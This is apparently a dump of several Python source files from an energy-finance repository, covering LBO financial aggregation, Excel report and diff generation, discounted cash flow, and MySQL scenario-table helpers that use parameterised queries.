    # annual_lbo_financials_df.to_csv("annual_lbo_financials_df.csv")
    pivot_annual_lbo_financials_df = pd.pivot_table(annual_lbo_financials_df, index=['portfolio','scenario','version','entity','year'], columns=['fsli'], values='value', aggfunc=np.sum)
    pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
    # Annual capacity factors recomputed from annual generation and hours.
    pivot_annual_lbo_financials_df['Capacity Factor'] = pivot_annual_lbo_financials_df['Generation'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - On Peak'] + pivot_annual_lbo_financials_df['Hours - Off Peak'] ))
    pivot_annual_lbo_financials_df['Capacity Factor - On Peak'] = pivot_annual_lbo_financials_df['Generation - On Peak'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - On Peak'] ))
    pivot_annual_lbo_financials_df['Capacity Factor - Off Peak'] = pivot_annual_lbo_financials_df['Generation - Off Peak'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - Off Peak'] ))
    annual_lbo_financials_df = pd.melt(pivot_annual_lbo_financials_df,
                                       id_vars=['portfolio','scenario','version','entity','year'],
                                       value_vars=[item for item in list(pivot_annual_lbo_financials_df.columns) if item not in ['portfolio','scenario','version','entity','year']],
                                       var_name='fsli',
                                       value_name='value')
    grouped_sum_fslis_lbo_financials_df = annual_lbo_financials_df
    # One fsli-by-year section per plant, stacked vertically on the tab.
    annual_lbo_financials_view_df = pd.DataFrame()
    for entity in entity_list:
        entity_annual_financials_df = grouped_sum_fslis_lbo_financials_df.loc[grouped_sum_fslis_lbo_financials_df.entity == entity]
        pivot_annual_lbo_financials_df = pd.pivot_table(entity_annual_financials_df, index=['portfolio','scenario','version','entity','fsli'], columns=['year'], values='value', aggfunc=np.sum)
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df[[item for item in pivot_annual_lbo_financials_df.columns if item not in ['portfolio','scenario','version','entity']]]
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.set_index('fsli')
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reindex(LBO_SUM_FSLIS + ['ICAP','Capacity Factor','Capacity Factor - On Peak','Capacity Factor - Off Peak'])
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
        pivot_annual_lbo_financials_df['entity'] = entity
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df[['entity'] + [item for item in pivot_annual_lbo_financials_df.columns if item not in ['entity']]]
        annual_lbo_financials_view_df = annual_lbo_financials_view_df.append(pivot_annual_lbo_financials_df)
    for r in dataframe_to_rows(annual_lbo_financials_view_df, index=False, header=True):
        annual_consolidated_tab.append(r)
    annual_consolidated_tab.title = 'AnnualByPlant'
    # annual view for fsli per portfolio
    annual_fsli_consolidated_tab = wb.copy_worksheet(wb.active)
    sum_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(LBO_SUM_FSLIS)]
    sum_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(sum_fslis_lbo_financials_df['period']).year
    grouped_sum_fslis_lbo_financials_df = sum_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','fsli','year']).sum()
    grouped_sum_fslis_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.reset_index()
    grouped_sum_fslis_lbo_financials_df = grouped_sum_fslis_lbo_financials_df[['fsli','year','value']]
    annual_lbo_financials_view_df = pd.pivot_table(grouped_sum_fslis_lbo_financials_df, index=['fsli'], columns=['year'], values='value', aggfunc=np.sum)
    annual_lbo_financials_view_df = annual_lbo_financials_view_df.reset_index()
    for r in dataframe_to_rows(annual_lbo_financials_view_df, index=False, header=True):
        annual_fsli_consolidated_tab.append(r)
    annual_fsli_consolidated_tab.title = 'AnnualFSLI'
    # monthly view for individual plant
    for entity in entity_list:
        entity_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.entity == entity]
        entity_tab = wb.copy_worksheet(wb.active)
        # Excel forbids '/' in sheet names, so it is replaced with a space.
        entity_tab.title = entity.replace("/"," ")
        entity_df = pd.pivot_table(entity_lbo_financials_df, index=['portfolio','scenario','version','fsli','entity'], columns=['period'], values='value', aggfunc=np.sum)
        entity_df = entity_df.reset_index()
        entity_df = entity_df[[column for column in entity_df.columns if column not in ['portfolio','scenario','version','entity']]]
        entity_df.rename(columns={'fsli': entity}, inplace=True)
        entity_df = entity_df.set_index(entity)
        entity_df = entity_df.reindex(['Energy Revenue','Delivered Fuel Expense','Variable O&M Expense',
                                       'Net Emissions Expense','Gross Energy Margin','Hedges',
                                       'Net Energy Margin','Fixed Fuel Transport','Capacity Revenue',
                                       'Ancillary Revenue','Other Revenue','Gross Margin',
                                       'FOM','Taxes','Insurance','Fixed Costs',
                                       'EBITDA','Capex','EBITDA less Capex',
                                       'ICAP', 'Generation', 'Generation - On Peak', 'Generation - Off Peak',
                                       'Capacity Factor', 'Capacity Factor - On Peak','Capacity Factor - Off Peak',
                                       'Realized Power Price - On Peak', 'Realized Power Price - Off Peak',
                                       'Realized Fuel Price - On Peak', 'Realized Fuel Price - Off Peak',
                                       'Realized Spread - ATC','Realized Spread - Off Peak','Realized Spread - On Peak',
                                       'Hours - On Peak', 'Hours - Off Peak'])
        entity_df = entity_df.reset_index()
        for r in dataframe_to_rows(entity_df, index=False, header=True):
            entity_tab.append(r)
    # Drop the default blank sheet that Workbook() created.
    wb.remove_sheet(wb.active)
    wb.save(dest_file_path + r"\\" + portfolio + "_" + lbo_financials_df['scenario'].iloc[0].replace(portfolio+" ", '') + "_" + lbo_financials_df['version'].iloc[0] + "_lbo_financials.xlsx")
def convert_annual_lbo_financials(lbo_financials_df):
    """Roll monthly LBO financials up to annual figures.

    Applies the LBO_FSLI_COLOR sign convention, sums LBO_SUM_FSLIS by year,
    averages ICAP by year, and recomputes the annual capacity factors.

    Args:
        lbo_financials_df: long-format frame with columns
            ['portfolio','scenario','version','entity','fsli','period','value'].

    Returns:
        A pair ``(long_df, view_df)``:
        long_df — annual values with columns
            ['portfolio','scenario','version','entity','fsli','year','value'];
        view_df — a report-shaped frame with one fsli-by-year section per
            entity, rows ordered per LBO_SUM_FSLIS plus capacity rows.
    """
    # step 1, apply lbo color for sinage
    pivot_lbo_financials_df = pd.pivot_table(lbo_financials_df, index=['portfolio','scenario','version','entity','period'], columns=['fsli'], values='value', aggfunc=np.sum)
    for fsli in LBO_FSLI_COLOR:
        pivot_lbo_financials_df[fsli] = pivot_lbo_financials_df[fsli] * LBO_FSLI_COLOR[fsli]
    pivot_lbo_financials_df = pivot_lbo_financials_df.reset_index()
    lbo_financials_df = pd.melt(pivot_lbo_financials_df, id_vars=['portfolio','scenario','version','entity','period'],
                                value_vars=[item for item in list(pivot_lbo_financials_df.columns) if item not in ['portfolio','scenario','version','entity','period']],
                                var_name='fsli',
                                value_name='value')
    lbo_financials_df = lbo_financials_df.reset_index()
    entity_list = list(sorted(list(set(list(lbo_financials_df['entity'])))))
    # Flow FSLIs sum by year; ICAP (a capacity level) averages by year.
    sum_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(LBO_SUM_FSLIS)]
    sum_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(sum_fslis_lbo_financials_df['period']).year
    grouped_sum_fslis_lbo_financials_df = sum_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','entity','fsli','year']).sum()
    grouped_sum_fslis_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.reset_index()
    average_fslis = ['ICAP']
    average_fslis_lbo_financials_df = lbo_financials_df.loc[lbo_financials_df.fsli.isin(average_fslis)]
    average_fslis_lbo_financials_df.loc[:,'year'] = pd.DatetimeIndex(average_fslis_lbo_financials_df['period']).year
    grouped_average_fslis_lbo_financials_df = average_fslis_lbo_financials_df.groupby(['portfolio','scenario','version','entity','fsli','year']).mean()
    grouped_average_fslis_lbo_financials_df = grouped_average_fslis_lbo_financials_df.reset_index()
    annual_lbo_financials_df = grouped_sum_fslis_lbo_financials_df.append(grouped_average_fslis_lbo_financials_df)
    """ pivot it to per year per column """
    pivot_annual_lbo_financials_df = pd.pivot_table(annual_lbo_financials_df, index=['portfolio','scenario','version','entity','year'], columns=['fsli'], values='value', aggfunc=np.sum)
    pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
    # Annual capacity factors from annual generation / (ICAP * annual hours).
    pivot_annual_lbo_financials_df['Capacity Factor'] = pivot_annual_lbo_financials_df['Generation'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - On Peak'] + pivot_annual_lbo_financials_df['Hours - Off Peak'] ))
    pivot_annual_lbo_financials_df['Capacity Factor - On Peak'] = pivot_annual_lbo_financials_df['Generation - On Peak'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - On Peak'] ))
    pivot_annual_lbo_financials_df['Capacity Factor - Off Peak'] = pivot_annual_lbo_financials_df['Generation - Off Peak'] / ( pivot_annual_lbo_financials_df['ICAP'] * ( pivot_annual_lbo_financials_df['Hours - Off Peak'] ))
    annual_lbo_financials_df = pd.melt(pivot_annual_lbo_financials_df,
                                       id_vars=['portfolio','scenario','version','entity','year'],
                                       value_vars=[item for item in list(pivot_annual_lbo_financials_df.columns) if item not in ['portfolio','scenario','version','entity','year']],
                                       var_name='fsli',
                                       value_name='value')
    grouped_sum_fslis_lbo_financials_df = annual_lbo_financials_df
    # Build the stacked per-entity report view, one fsli-by-year block each.
    annual_lbo_financials_view_df = pd.DataFrame()
    for entity in entity_list:
        entity_annual_financials_df = grouped_sum_fslis_lbo_financials_df.loc[grouped_sum_fslis_lbo_financials_df.entity == entity]
        pivot_annual_lbo_financials_df = pd.pivot_table(entity_annual_financials_df, index=['portfolio','scenario','version','entity','fsli'], columns=['year'], values='value', aggfunc=np.sum)
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df[[item for item in pivot_annual_lbo_financials_df.columns if item not in ['portfolio','scenario','version','entity']]]
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.set_index('fsli')
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reindex(LBO_SUM_FSLIS + ['ICAP','Capacity Factor','Capacity Factor - On Peak','Capacity Factor - Off Peak'])
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df.reset_index()
        pivot_annual_lbo_financials_df['entity'] = entity
        pivot_annual_lbo_financials_df = pivot_annual_lbo_financials_df[['entity'] + [item for item in pivot_annual_lbo_financials_df.columns if item not in ['entity']]]
        annual_lbo_financials_view_df = annual_lbo_financials_view_df.append(pivot_annual_lbo_financials_df)
    return annual_lbo_financials_df[['portfolio','scenario','version','entity','fsli','year','value']], annual_lbo_financials_view_df
def write_lbo_financials_diff_report(dest_file_path, portfolio, first_lbo_financials_df, second_lbo_financials_df):
    """Write an Excel workbook comparing two annual LBO financial runs.

    Produces three tabs: the annual view of each scenario and a per-entity,
    per-FSLI diff (first minus second) pivoted by year.

    Args:
        dest_file_path: Directory the workbook is written into.
        portfolio: Portfolio name (accepted for interface stability; not read
            here -- the merged frames already carry a portfolio column).
        first_lbo_financials_df: LBO financials for the first scenario;
            scenario/version are read from its first row for the filename.
        second_lbo_financials_df: Same for the second scenario.
    """
    wb = Workbook()
    first_annual_lbo_financials_df, first_annual_lbo_financials_view_df = convert_annual_lbo_financials(first_lbo_financials_df)
    second_annual_lbo_financials_df, second_annual_lbo_financials_view_df = convert_annual_lbo_financials(second_lbo_financials_df)
    # Inner join keeps only entity/fsli/year combinations present in both runs.
    merged_annual_lbo_financials_df = pd.merge(first_annual_lbo_financials_df, second_annual_lbo_financials_df, on=['portfolio','entity','fsli','year'], how='inner')
    merged_annual_lbo_financials_df = merged_annual_lbo_financials_df.reset_index()
    merged_annual_lbo_financials_df = merged_annual_lbo_financials_df[['portfolio','entity','fsli','year','value_x','value_y']]
    merged_annual_lbo_financials_df.rename(columns={'value_x':'first_financials_value','value_y':'second_financials_value'}, inplace=True)
    merged_annual_lbo_financials_df['diff_first_minus_second'] = merged_annual_lbo_financials_df['first_financials_value'] - merged_annual_lbo_financials_df['second_financials_value']
    first_scenario_version = first_lbo_financials_df.iloc[0]['scenario'] + "-" + first_lbo_financials_df.iloc[0]['version']
    second_scenario_version = second_lbo_financials_df.iloc[0]['scenario'] + "-" + second_lbo_financials_df.iloc[0]['version']
    first_scenario_tab = wb.copy_worksheet(wb.active)
    for r in dataframe_to_rows(first_annual_lbo_financials_view_df, index=False, header=True):
        first_scenario_tab.append(r)
    first_scenario_tab.title = 'FirstScenarioAnnual'
    second_scenario_tab = wb.copy_worksheet(wb.active)
    for r in dataframe_to_rows(second_annual_lbo_financials_view_df, index=False, header=True):
        second_scenario_tab.append(r)
    second_scenario_tab.title = 'SecondScenarioAnnual'
    merged_annual_lbo_financials_df = merged_annual_lbo_financials_df[['portfolio', 'entity', 'fsli', 'year', 'diff_first_minus_second']]
    pivot_diff_lbo_financials_df = pd.pivot_table(merged_annual_lbo_financials_df, index=['portfolio','entity','fsli'], columns=['year'], values='diff_first_minus_second', aggfunc=np.sum)
    pivot_diff_lbo_financials_df = pivot_diff_lbo_financials_df.reset_index()
    pivot_diff_lbo_financials_df = pivot_diff_lbo_financials_df[[item for item in pivot_diff_lbo_financials_df.columns if item != 'portfolio']]
    diff_result_df = pd.DataFrame()
    entity_list = list(sorted(list(set(list(merged_annual_lbo_financials_df['entity'])))))
    for entity in entity_list:
        entity_annual_financials_df = pivot_diff_lbo_financials_df.loc[pivot_diff_lbo_financials_df.entity == entity]
        entity_annual_financials_df = entity_annual_financials_df.set_index('fsli')
        # Force a fixed FSLI ordering (sum FSLIs then capacity metrics) per entity.
        entity_annual_financials_df = entity_annual_financials_df.reindex(LBO_SUM_FSLIS + ['ICAP','Capacity Factor','Capacity Factor - On Peak','Capacity Factor - Off Peak'])
        entity_annual_financials_df = entity_annual_financials_df.reset_index()
        # FIX: DataFrame.append was removed in pandas 2.0 -- use pd.concat.
        diff_result_df = pd.concat([diff_result_df, entity_annual_financials_df])
    diff_result_df = diff_result_df[['entity','fsli'] + [item for item in diff_result_df.columns if item not in ['entity','fsli']]]
    diff_scenario_tab = wb.copy_worksheet(wb.active)
    for r in dataframe_to_rows(diff_result_df, index=False, header=True):
        diff_scenario_tab.append(r)
    diff_scenario_tab.title = 'DiffAnnual'
    # FIX: Workbook.remove_sheet is deprecated in openpyxl; remove is the
    # supported API. Drops the blank default sheet before saving.
    wb.remove(wb.active)
    wb.save(dest_file_path + r"\diff_lbo_financials_" + first_scenario_version + " vs " + second_scenario_version + ".xlsx")
def write_lbo_graph_report(template_path, lbo_financials_df, saved_file_path=None):
    """Append annual LBO financials into a graph template workbook.

    Args:
        template_path: Path to an Excel template containing a
            'KEAN LBO Financials' tab.
        lbo_financials_df: LBO financials; scenario/version are read from the
            first row to build the default output filename.
        saved_file_path: Optional output path. When None, falls back to the
            historical hard-coded Dropbox location (kept only for backward
            compatibility -- prefer passing an explicit path).
    """
    scenario = lbo_financials_df.iloc[0]['scenario']
    version = lbo_financials_df.iloc[0]['version']
    if saved_file_path is None:
        # Legacy default: user-specific absolute path, parameterized above so
        # other machines/users can redirect the output.
        saved_file_path = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\requirement_docs\vector_report\LBO Graphs " + scenario + version + ".xlsx"
    wb = opx.load_workbook(template_path)
    input_tab = wb['KEAN LBO Financials']
    annual_financials_df, annual_lbo_financials_view_df = convert_annual_lbo_financials(lbo_financials_df)
    for r in dataframe_to_rows(annual_lbo_financials_view_df, index=False, header=True):
        input_tab.append(r)
    wb.save(saved_file_path)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,739 | changliukean/KEAN3 | refs/heads/master | /financial/FreeCashFlow.py | from dateutil.relativedelta import relativedelta
from financial import FSLI
class FreeCashFlow(FSLI):
    """A free-cash-flow line item that can be discounted back to time zero.

    NOTE(review): the enclosing file does `from financial import FSLI`, which
    binds the FSLI *module*, not the FSLI class other files import via
    `from financial.FSLI import FSLI` -- confirm the import at the top of
    this file resolves to the class.
    """

    def __init__(self, date_start, date_end, amount, time_zero, discount_rate=0, discounted_amount=0, discount_factor=0):
        FSLI.__init__(self, 'Free Cash Flow', date_start, date_end, amount, credit_sign=1, is_subtotal=True)
        self.discountRate = discount_rate
        self.timeZero = time_zero
        self.discountedAmount = discounted_amount
        self.discountFactor = discount_factor

    def calculate_discount_factor(self):
        """Compute, cache and return 1 / (1 + r)^n, n = whole years to end date."""
        # BUG FIX: both calculation methods previously read self.time_zero,
        # which is never assigned (the constructor stores self.timeZero), so
        # they raised AttributeError. self.end_date is assumed to be set by
        # the FSLI base class from date_end -- TODO confirm.
        difference_in_years = relativedelta(self.end_date, self.timeZero).years
        self.discountFactor = 1 / ((1 + self.discountRate) ** difference_in_years)
        return self.discountFactor

    def calculate_discounted_cashflow(self):
        """Discount self.amount back to time zero; cache and return the value."""
        difference_in_years = relativedelta(self.end_date, self.timeZero).years
        self.discountedAmount = self.amount * (1 / ((1 + self.discountRate) ** difference_in_years))
        return self.discountedAmount

    @staticmethod
    def calculate_wacc(equity_cost_of_capital, debt_cost_of_capital, equity_percentage):
        """Weighted average cost of capital for the given equity fraction."""
        return equity_percentage * equity_cost_of_capital + (1 - equity_percentage) * debt_cost_of_capital
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,740 | changliukean/KEAN3 | refs/heads/master | /main.py | from scenario_control.Scenario import Scenario, ScenarioMaster
from datetime import datetime, date
from financial.FSLI import FSLI
if __name__ == '__main__':
    # Smoke-test driver: per year builds GEM + Other Revenue -> Net Margin,
    # then Net Margin - Fixed Costs -> EBITDA, and prints the EBITDA FSLIs.
    year_start = 2020
    year_end = 2025
    # One value per year starting at year_start. Note range(year_start,
    # year_end) excludes year_end, so only the first five values are consumed.
    gem_value_list = [45636322, 41712668, 46086042, 47736731, 50610844, 54406182]
    otherrev_value_list = [10000000, 10000000, 10000000, 10000000, 10000000, 10000000]
    fixedcosts_value_list = [15000000, 15000000, 15000000, 15000000, 15000000, 15000000]
    capex_value_list = [1500000, 1500000, 1500000, 1500000, 1500000, 1500000]
    gem_fsli_list = []
    otherrev_fsli_list = []
    net_margin_fsli_list = []
    fixedcost_fsli_list = []
    ebitda_fsli_list = []
    total_capex_fsli_list = []
    for index, year in enumerate(range(year_start, year_end)):
        # BUG FIX: the period boundaries previously used year_start for every
        # iteration, so all FSLIs covered 2020 regardless of the loop year.
        year_start_date = date(year, 1, 1)
        year_end_date = date(year, 12, 31)
        gem_fsli = FSLI("Gross Energy Margin", year_start_date, year_end_date, gem_value_list[index], credit_sign=1)
        otherrev_fsli = FSLI("Total Other Revenue", year_start_date, year_end_date, otherrev_value_list[index], credit_sign=1, is_subtotal=True)
        net_margin_fsli = FSLI("Net Margin", year_start_date, year_end_date, credit_sign=1, is_subtotal=True)
        net_margin_fsli.calc_subtotal([gem_fsli, otherrev_fsli])
        gem_fsli_list.append(gem_fsli)
        otherrev_fsli_list.append(otherrev_fsli)
        net_margin_fsli_list.append(net_margin_fsli)
        fixedcost_fsli = FSLI("Total Fixed Costs", year_start_date, year_end_date, fixedcosts_value_list[index], credit_sign=-1, is_subtotal=True)
        # BUG FIX: this FSLI was previously appended onto fixedcosts_value_list
        # (the input numbers) instead of its own collection list.
        fixedcost_fsli_list.append(fixedcost_fsli)
        capex_fsli = FSLI("Total Capex", year_start_date, year_end_date, capex_value_list[index], credit_sign=-1, is_subtotal=True)
        # BUG FIX: capex FSLIs were built but never collected.
        total_capex_fsli_list.append(capex_fsli)
        ebitda_fsli = FSLI("EBITDA", year_start_date, year_end_date, credit_sign=1, is_subtotal=True)
        ebitda_fsli.calc_subtotal([net_margin_fsli, fixedcost_fsli])
        ebitda_fsli_list.append(ebitda_fsli)
    for obj in ebitda_fsli_list:
        print(obj)
# #
| {"/lbo_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"], "/lbo_oob_testcases.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py", "/reportwriter/ReportWriter.py"], "/database/dbLiquidity.py": ["/database/dbGeneral.py"], "/database/dbDispatch.py": ["/database/dbGeneral.py"], "/lbo/lbo.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/main.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbScenarioMaster.py": ["/database/dbGeneral.py"], "/database/dbPrices.py": ["/database/dbGeneral.py"], "/model/Portfolio.py": ["/model/Entity.py"], "/liquidity/Liquidity.py": ["/scenario_control/Scenario.py", "/utility/dateUtils.py"], "/scenario_master_testcase.py": ["/scenario_control/Scenario.py", "/financial/FSLI.py"], "/database/dbLBO.py": ["/database/dbGeneral.py"], "/database/dbPCUC.py": ["/database/dbGeneral.py"], "/liquidity_oob_test.py": ["/liquidity/Liquidity.py", "/reportwriter/ReportWriter.py"], "/utility/dispatchUtils.py": ["/utility/dateUtils.py", "/database/dbPrices.py"], "/lbo_diff.py": ["/utility/dispatchUtils.py", "/database/dbPCUC.py", "/database/dbDispatch.py", "/database/dbLBO.py", "/database/dbScenarioMaster.py", "/utility/lboUtils.py", "/model/Entity.py", "/model/Portfolio.py", "/utility/dateUtils.py"]} |
50,741 | changliukean/KEAN3 | refs/heads/master | /database/dbScenarioMaster.py | from database.dbGeneral import HOST, USER, PASSWORD, DATABASE, config_connection
import pandas as pd
from sqlalchemy import create_engine
def get_scenario_master(output_portfolio, output_scenario_name, output_version, output_module, output_table):
    """Fetch scenario_master rows matching the given output identifiers.

    Returns:
        DataFrame of matching scenario_master rows (empty if none match).
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    # SECURITY FIX: use bound parameters instead of string concatenation to
    # prevent SQL injection and quoting bugs in the filter values.
    sql_statement = """
        SELECT * FROM scenario_master
        WHERE portfolio = %s
          AND output_module = %s
          AND output_scenario = %s
          AND output_table = %s
          AND output_version = %s
        ;
    """
    raw_scenario_master_df = pd.read_sql(
        sql_statement,
        connection_instance,
        params=[output_portfolio, output_module, output_scenario_name, output_table, output_version])
    connection_instance.close()
    return raw_scenario_master_df
def get_scenario_master_datetime(portfolio, scenario, version, module):
    """Fetch scenario_datetime rows for one portfolio/scenario/version/module.

    Returns:
        DataFrame of matching scenario_datetime rows (empty if none match).
    """
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    # SECURITY FIX: use bound parameters instead of string concatenation to
    # prevent SQL injection and quoting bugs in the filter values.
    sql_statement = """
        SELECT * FROM scenario_datetime
        WHERE portfolio = %s
          AND module = %s
          AND scenario = %s
          AND version = %s
        ;
    """
    raw_scenario_master_datetime_df = pd.read_sql(
        sql_statement,
        connection_instance,
        params=[portfolio, module, scenario, version])
    connection_instance.close()
    return raw_scenario_master_datetime_df
def delete_scenario_master(output_portfolio, output_scenario_name, output_version, output_module, output_table):
    """Delete scenario_master rows matching the given output identifiers."""
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    # SECURITY FIX: bound parameters instead of string-concatenated SQL.
    delete_sql_statement = """
        DELETE FROM scenario_master
        WHERE portfolio = %s
          AND output_module = %s
          AND output_scenario = %s
          AND output_table = %s
          AND output_version = %s
        ;
    """
    cursor = connection_instance.cursor()
    cursor.execute(delete_sql_statement,
                   (output_portfolio, output_module, output_scenario_name, output_table, output_version))
    connection_instance.commit()
    cursor.close()
    connection_instance.close()
def delete_scenario_datetime(portfolio, scenario, version, module):
    """Delete scenario_datetime rows for one portfolio/scenario/version/module."""
    connection_instance = config_connection(HOST, USER, PASSWORD, DATABASE)
    # SECURITY FIX: bound parameters instead of string-concatenated SQL.
    # (Also drops the leftover debug print of the raw statement.)
    delete_sql_statement = """
        DELETE FROM scenario_datetime
        WHERE portfolio = %s
          AND module = %s
          AND scenario = %s
          AND version = %s
        ;
    """
    cursor = connection_instance.cursor()
    cursor.execute(delete_sql_statement, (portfolio, module, scenario, version))
    connection_instance.commit()
    cursor.close()
    connection_instance.close()
def insert_scenario_datetime(module, portfolio, scenario, version, start_year, number_of_years, forecast_start_month, valuation_date):
    """Append a single row to the scenario_datetime table."""
    columns = ['module', 'portfolio', 'scenario', 'version', 'start_year',
               'number_of_years', 'forecast_start_month', 'valuation_date']
    values = [module, portfolio, scenario, version, start_year,
              number_of_years, forecast_start_month, valuation_date]
    row_df = pd.DataFrame(data=[values], columns=columns)
    connection_url = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
    db_engine = create_engine(connection_url, encoding='latin1', echo=True)
    row_df.to_sql(name='scenario_datetime', con=db_engine, if_exists='append', index=False)
def insert_scenario_master(ready_to_kean_sm_df):
    """Append the given DataFrame's rows to the scenario_master table."""
    connection_url = 'mysql+mysqlconnector://' + USER + ':' + PASSWORD + '@' + HOST + '/' + DATABASE
    db_engine = create_engine(connection_url, encoding='latin1', echo=True)
    ready_to_kean_sm_df.to_sql(name='scenario_master', con=db_engine, if_exists='append', index=False)
# #
